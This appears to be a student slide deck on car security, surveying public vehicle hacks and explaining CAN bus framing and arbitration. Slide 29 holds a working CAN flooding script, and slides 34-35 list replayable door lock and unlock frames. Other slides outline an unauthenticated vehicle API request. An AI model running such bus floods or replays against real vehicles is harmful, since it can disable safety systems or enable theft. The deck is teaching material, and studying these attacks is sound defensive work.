Slide 1

Slide 1 text

Car Security
Attacking On the CAN Bus
Student : Tien-Chih Lin@NCKU
Advisor : PK, Birdman, Benson, Alan

Slide 2

Slide 2 text

$ Outline
• Attack Vector
• Intro of CAN Bus
• Security Issues on CAN Bus
• Conclusion

Slide 3

Slide 3 text

>_ Attack Vector

Slide 4

Slide 4 text

$ Attack Vector Overview

Slide 5

Slide 5 text

$ Physical Attack
• Attack Interface
− USB Ports
− SD-Card Ports
− CD-ROM / DVD-ROM
− Touch Screen
− CAT-5

Slide 6

Slide 6 text

$ Case Study : CAT-5
• DEFCON 23 - How to Hack a Tesla Model S

Slide 8

Slide 8 text

$ Scanning with nmap
Device                              IP              Port      Service
CID (Central Information Display)   192.168.90.100  22/tcp    ssh
                                                    53/tcp    domain
                                                    80/tcp    http
                                                    111/tcp   rpcbind
                                                    2049/tcp  nfs
                                                    6000/tcp  X11
IC (Instrument Cluster)             192.168.90.101  22/tcp    ssh
                                                    111/tcp   rpcbind
                                                    6000/tcp  X11
Gateway                             192.168.90.102  23/tcp    telnet
                                                    1050/tcp  java-or-OTGfileshare

Slide 11

Slide 11 text

$ Remote Attack
• Attack Interface
− Bluetooth
− Wi-Fi
− Cellular Connection
− Remote Keyless Entry
− TPMS

Slide 12

Slide 12 text

$ Case Study : Remote Keyless Entry
• Fixed Code
[Diagram: the remote sends the same message on every press: UID, btn]

Slide 13

Slide 13 text

$ Case Study : Remote Keyless Entry
• Rolling Code
[Diagram: successive messages from the remote]
    UID, enc_k ctr′, btn
    UID, enc_k ctr′ + 1, btn
    UID, enc_k ctr′ + 2, btn
[Diagram: validity window on the receiver, from ctr to ctr + ∆]
Receiver:
    Decrypt ctr′
    if (ctr < ctr′ < ctr + ∆)
        ctr := ctr′
        open/close
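The receiver-side window check from this slide, as an added example that is not part of the original deck. It assumes a 9-byte message layout, a window of ∆ = 16 and button codes 1 = unlock, 2 = lock, and it uses an HMAC-SHA256 tag as a stand-in for enc_k so that it runs on the standard library alone.

```python
import hashlib
import hmac
import struct

DELTA = 16  # validity window ∆ (constructed value)

def fob_message(key, uid, ctr, btn):
    """Remote side: UID || ctr' || btn || tag. The HMAC tag stands in for enc_k."""
    body = struct.pack(">IIB", uid, ctr, btn)
    return body + hmac.new(key, body, hashlib.sha256).digest()[:8]

class Receiver:
    def __init__(self, key, uid, ctr=0, delta=DELTA):
        self.key, self.uid, self.ctr, self.delta = key, uid, ctr, delta

    def handle(self, msg):
        if len(msg) != 17:
            return "reject:malformed"
        body, tag = msg[:9], msg[9:]
        expected = hmac.new(self.key, body, hashlib.sha256).digest()[:8]
        if not hmac.compare_digest(tag, expected):
            return "reject:bad-tag"
        uid, ctr_rx, btn = struct.unpack(">IIB", body)
        if uid != self.uid:
            return "reject:unknown-uid"
        # Slide rule: if (ctr < ctr' < ctr + ∆) then ctr := ctr' and open/close
        if not (self.ctr < ctr_rx < self.ctr + self.delta):
            return "reject:outside-window"
        self.ctr = ctr_rx
        return "unlock" if btn == 1 else "lock"

def demo():
    key = b"constructed-demo-key"
    rx = Receiver(key, uid=0x1234, ctr=100)
    m101 = fob_message(key, 0x1234, 101, 1)
    return [
        rx.handle(m101),                                      # fresh counter
        rx.handle(m101),                                      # replayed message
        rx.handle(fob_message(key, 0x1234, 105, 2)),          # presses missed, in window
        rx.handle(fob_message(key, 0x1234, 105 + DELTA, 1)),  # too far ahead
        rx.handle(fob_message(b"wrong-key", 0x1234, 106, 1)), # wrong key
    ]

if __name__ == "__main__":
    print(demo())
```
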

Slide 14

Slide 14 text

$ Case Study : Remote Keyless Entry
• Attack Rolling Code
[Diagram: the message enc_k UID, ctr′, btn, annotated with "Attack crypto" and "Attack key management"]

Slide 15

Slide 15 text

$ Wireless Hacking Unlock 100 Million Volkswagens, 2016

Slide 16

Slide 16 text

$ Case Study : API
• Controlling vehicle features of Nissan LEAFs across the globe via vulnerable APIs

Slide 17

Slide 17 text

$ Request
• GET https://[redacted].com/orchestration_1111/gdc/RemoteACRecordsRequest.php?RegionCode=NE&lg=noNO&DCMID=&VIN=SJNFAAZE0U60XXXXX

Slide 18

Slide 18 text

$ Response
{
  status: 200,
  message: "success",
  BatteryStatusRecords: {
    OperationResult: "START",
    OperationDateAndTime: "jan 21, 2016 21:47",
    BatteryStatus: {
      BatteryChargingStatus: "NORMAL_CHARGING",
      BatteryCapacity: "12",
      BatteryRemainingAmount: "12",
      BatteryRemainingAmountWH: "",
    },
    PluginState: "CONNECTED",
    CruisingRangeAcOn: "135664.0",
    CruisingRangeAcOff: "157904.0",
    NotificationDateAndTime: "2016/01/21 20:47",
    TargetDate: "2016/01/21 20:47"
  }
}

Slide 19

Slide 19 text

$ API without Authentication
• GET https://[redacted].com/orchestration_1111/gdc/RemoteACRecordsRequest.php?RegionCode=NE&lg=noNO&DCMID=&VIN=SJNFAAZE0U60XXXXX
• VIN : Vehicle Identification Number

Slide 21

Slide 21 text

$ Case Study : Wi-Fi
• Black Hat 2017 : Free-fall: Tesla Hacking
− Get control of Wi-Fi
− Exploit the WebKit browser
− Root the in-vehicle system
− Patch and disable AppArmor
− Bypass ECU's firmware integrity verification
− Reprogram modified Gateway firmware
− Send malicious CAN msg on CAN Bus
− Get control of CAN Bus
[Diagram labels: CID, ECUs]

Slide 22

Slide 22 text

Why Hack the CAN Bus?

Slide 23

Slide 23 text

>_ Intro of CAN Bus

Slide 24

Slide 24 text

$ What is CAN Bus?
• Controller Area Network
• Low cost, integrated controllers
[Diagram: Head light, Tail light, Dash board and Doors on the Low Speed CAN (Body Control Bus); ABS, Engine Control and Suspension Control on the High Speed CAN (Powertrain Control Bus); a Gateway between the two buses]

Slide 25

Slide 25 text

$ CAN Data Frame Format
Field                             Size
Arbitration Identifier (ArbID)    11 bits or 29 bits
Data Length Code (DLC)            4 bits
Data                              Up to 8 bytes

Slide 26

Slide 26 text

$ CAN Bus Arbitration
• Supported by hardware
• Software implementation becomes easy and immediate.
• Priority : 0 > 1
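A small simulation of the "0 > 1" rule, added here as an example and not taken from the slides. It models the bus as a wired-AND of the identifier bits sent MSB first, for 11-bit identifiers, and uses ArbIDs that appear in the door captures later in this deck plus 0x000.

```python
def arbitrate(arb_ids, id_bits=11):
    """Bitwise arbitration among nodes that start transmitting together.

    Returns (winner, lost_at), where lost_at maps each losing ArbID to the
    index (0 = first bit sent) at which it backed off.
    """
    contenders = set(arb_ids)
    lost_at = {}
    for bit in range(id_bits - 1, -1, -1):          # MSB is sent first
        sent = {i: (i >> bit) & 1 for i in contenders}
        bus = min(sent.values())                    # any dominant 0 pulls the bus to 0
        for arb_id, level in sent.items():
            if level != bus:                        # sent recessive 1, read back 0
                lost_at[arb_id] = id_bits - 1 - bit
        contenders = {i for i in contenders if sent[i] == bus}
    return contenders.pop(), lost_at

def transmit_order(pending):
    """Order in which a set of queued frames reaches the bus."""
    pending = set(pending)
    order = []
    while pending:
        winner, _ = arbitrate(pending)
        order.append(winner)
        pending.discard(winner)
    return order

if __name__ == "__main__":
    winner, lost_at = arbitrate([0x440, 0x442, 0x44D, 0x631])
    print(hex(winner), {hex(k): v for k, v in lost_at.items()})
    print([hex(i) for i in transmit_order([0x631, 0x44D, 0x000, 0x442, 0x440])])
```

The numerically lowest identifier always wins, so a frame with ArbID 0x000 is never delayed by any other traffic.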

Slide 27

Slide 27 text

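$ Fault Confinement
States: Error Active, Error Passive, Bus Off
• Reset and Config: enter Error Active
• Error Active to Error Passive: REC => 127 or TEC => 127
• Error Passive to Error Active: REC < 127 or TEC < 127
• Error Passive to Bus Off: TEC > 255
• Bus Off to Error Active: Reset, Config and Reception of 128x11 Recessive Bits
REC: Receive Error Counter
TEC: Transmit Error Counter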

Slide 28

Slide 28 text

>_ Security Issues on CAN Bus

Slide 29

Slide 29 text

$ Denial-of-Service
import ics

device = ics.find_devices()[0]
ics.open_device(device)
NetworkID = ics.NETID_HSCAN
ics.set_bit_rate(device,500000,NetworkID)
msg = ics.SpyMessage()
# Setup the message
msg.ArbIDOrHeader = 0x0 # CAN ID
msg.NetworkID = NetworkID # Channel 1 on the ValueCAN
msg.Data = (0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0)
while(1):
    ics.transmit_messages(device, msg)
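Detection logic for this flooding pattern, added as an example and not part of the original slides. It assumes a capture given as (timestamp in microseconds, ArbID) pairs; the capture, the 100 ms window and the 50% share threshold are constructed for illustration, and the baseline ArbIDs are the ones in the door captures later in this deck.

```python
from collections import Counter, deque

BASELINE_IDS = {0x440, 0x442, 0x44D, 0x631}  # ArbIDs from the page's door captures

def constructed_capture():
    """Constructed log: 0.5 s of periodic traffic, then 0.1 s of ArbID 0x000 only."""
    frames = []
    for t in range(0, 500_000, 10_000):
        for n, arb_id in enumerate(sorted(BASELINE_IDS)):
            frames.append((t + 1_000 * n, arb_id))
    frames += [(t, 0x000) for t in range(500_000, 600_000, 500)]
    return frames

def detect_flood(frames, known_ids, window_us=100_000, max_share=0.5, min_frames=20):
    """Alert when one ArbID exceeds max_share of all frames in a sliding window.

    Returns {arb_id: (timestamp_us, share, reason)} with the first alert per ID.
    """
    recent = deque()
    counts = Counter()
    alerts = {}
    for ts, arb_id in frames:
        recent.append((ts, arb_id))
        counts[arb_id] += 1
        while ts - recent[0][0] > window_us:     # drop frames older than the window
            _, old_id = recent.popleft()
            counts[old_id] -= 1
        share = counts[arb_id] / len(recent)
        if len(recent) >= min_frames and share > max_share and arb_id not in alerts:
            reason = "known-id" if arb_id in known_ids else "unknown-id"
            alerts[arb_id] = (ts, share, reason)
    return alerts

if __name__ == "__main__":
    for arb_id, (ts, share, reason) in detect_flood(constructed_capture(), BASELINE_IDS).items():
        print(f"ArbID {arb_id:03X} at {ts} us: {share:.0%} of bus traffic ({reason})")
```
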

Slide 30

Slide 30 text

$ Testbed

Slide 31

Slide 31 text

$ Result

Slide 32

Slide 32 text

$ Replay Attack
[Diagram: Head light, Tail light, Dash board, Doors, ABS, Engine Control, Suspension Control and Gateway on the CAN Bus, with an Attacker node attached]

Slide 33

Slide 33 text

$ Testbed

Slide 34

Slide 34 text

$ Unlock the Door
ArbID   Data…
44D     4D,00,80,00,00,00,00,00
440     40,00,80,11,01,0F,0F,0F
442     42,00,80,00,00,00,00,00
44D     4D,01,80,00,01,00,00,00
440     40,01,80,11,01,00,00,00
631     18,80,53,04,00,12,00,00

Slide 35

Slide 35 text

$ Lock the Door
ArbID   Data…
44D     4D,00,80,00,00,00,00,00
440     40,00,80,11,01,0F,0F,0F
442     42,00,80,00,00,00,00,00
44D     4D,01,80,00,01,00,00,00
440     40,01,80,11,01,00,00,00
631     18,80,53,02,00,12,00,00

Slide 36

Slide 36 text

$ Demo

Slide 37

Slide 37 text

>_ Conclusion
• Survey of Car Security
− Cyber security skills are useful in car security.
• CAN Bus
− A useful protocol before cars were connected to the Internet.
− Easy to attack with DoS and replay attacks.

Slide 38

Slide 38 text

$ Reference
• https://hitcon.org/2018/CMT/slide-files/d2_s0_r0_keynote.pdf
• http://www.blackhat.com/docs/asia-15/materials/asia-15-Evenchick-Hopping-On-The-Can-Bus.pdf
• http://www.cheyun.com/content/15847
• http://illmatics.com/carhacking.html
• https://www.tomshardware.co.uk/intel-automotive-security-review-board,news-51291.html
• https://blog.lookout.com/hacking-a-tesla
• https://www.blackhat.com/docs/us-17/thursday/us-17-Nie-Free-Fall-Hacking-Tesla-From-Wireless-To-CAN-Bus.pdf
• https://www.cryptacus.eu/en/wp-content/uploads/201611_WG4_Garcia.pdf
• https://www.troyhunt.com/controlling-vehicle-features-of-nissan/
• http://wiki.csie.ncku.edu.tw/embedded/CAN
• https://goo.gl/kXyyhx